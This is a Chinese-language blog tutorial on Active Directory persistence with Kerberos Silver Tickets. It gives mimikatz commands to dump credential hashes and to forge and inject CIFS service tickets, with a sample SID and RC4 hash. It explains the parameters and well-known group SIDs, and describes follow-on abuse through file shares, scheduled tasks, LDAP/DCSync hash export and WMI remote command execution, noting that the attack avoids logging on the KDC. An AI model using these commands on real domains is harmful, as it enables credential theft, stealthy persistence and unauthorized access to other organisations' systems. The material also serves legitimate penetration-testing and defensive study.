域渗透-权限维持之 Silver Tickets
Windows AD Persistence Pth    712    0    0

一、利用基础

        在知道目标机器的NTLM hash域SID的基础上,可以伪造任意用户访问目标机器上的服务。其过程不会与KDC通信,因此不会再KDC上留下任何痕迹,只会在目标机器和本机留下日志。可以利用的服务如下:

服务注释服务名称
WMIHOST&RPCSS
Powershell RemoteingHOST&HTTP
WinRMHOST&HTTP
Scheduled TasksHOST
LDAP、DCSyncLDAP
Windows File Share(CIFS)CIFS
Windows Remote Server Administration ToolsRPCSS&LDAP&CIFS

 

 

二、白银票据伪造

    1. 需要事先导出目标机器的服务Hash,利用的工具很多,这里用mimikatz演示

mimikatz.exe "privilege::debug” "sekurlsa::logonpasswords" "exit" 

 

 

    2. 利用mimikatz进行白银票据伪造并直接注入到内存

mimikatz "kerberos::golden /user:any-user /domain:domain.com /sid:S-1-5-21-2056922362-3943291772-3165935835 /target:dc-01.domain.com /rc4:cd76662d4420b930cce605b6edab46a1 /service:cifs /ptt" "exit" 

参数说明:

 

/domain:域的完整名称,如:lab.adsecurity.org
/sid:域SID,如:S-1-5-21-1473643419-774954089-2222329127
/user:域用户名,白银票据可以是任意用户,可以不存在
/service:指定服务类型,如:host、cifs、http、rpcss、ldap等
/groups(可选):用户所属的组RID,指定用户权限
/ticket(可选):指定一个路径保存票据
/ptt(可选):将申请的票据直接注入内存
/id(可选):用户RID,Mimikatz默认值是500(默认管理员帐户RID)
/endin(可选):票据有效时间,Mimikatz默认值是10年,Active Directory默认Kerberos策略设置为10小时
/renewmax(可选):续订最长票据有效时间,Mimikatz默认值是10年,Active Directory默认Kerberos策略设置为最长为7天
/startoffset(可选):票证可用时的起始偏移(如果使用此选项,通常设置为-10或0)Mimikatz默认值是0

其中的需要注意的是/sid 指定的是域SID,一般查看到的SID结构=域SID+所属组RID,常见的用户SID如下:

默认管理员SID:SID:S-1-5-21 <DOMAINID> -500
域用户SID:S-1-5-21 <DOMAINID> -513
域管理员SID:S-1-5-21 <DOMAINID> -512
架构管理员SID:S-1-5-21 <DOMAINID> -518
企业管理员SID:S-1-5-21 <DOMAINID> -519
组策略创建者所有者SID:S-1-5-21 <DOMAINID> -520

 

    (1)在注入目标的Windows File Share(cifs)访问票据后,可以访问目标计算机上的任何共享,包括c $共享,能够将文件拷贝到目标系统上

mimikatz "kerberos::golden /user:ptttest /domain:thug.com /sid:S-1-5-21-2056922362-3943291772-3165935835 /target:dc-01.thug.com /rc4:cd76662d4420b930cce605b6edab46a1 /service:cifs /ptt" exit 

 

    (2)注入目标Scheduled Tasks服务(host)访问票据后,可以在目标机器上创建计划任务

 

    (3)在注入http和wsman服务后,可以获得目标系统上的WinRM和Powershell远程管理的权限,但是在实际测试中并没有利用成功,尚未解决

 

New-PSSession -Name PSC -ComputerName dc-01;Enter-PSSession -Name PSC 

 

    (4)在注入ldap服务票据后,可以获得目标系统上LDAP服务的管理权限,进而可以利用dcsync远程导出域控上的hash

 

    (5)注入host和rpcss服务的白银票据后,可以利用wmi在目标系统上执行命令。在测试中也没有成功,尚未解决。

 

wmic /AUTHORITY:"kerberos:thug.com\dc-01" /NODE:"dc-01" process call create "cmd /c echo 111 > C:\Users\Administrator\Desktop\111.txt"

 

 

 

三、结束语

        哪位师傅测试成功了,烦请指点一二,不胜感激!

 

 

参考链接:

[1] backlion 师傅 Blog

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

觉得不错,点个赞?
Sign in to leave a comment.
No Leanote account ? Sign up now.
0 条评论
文章目录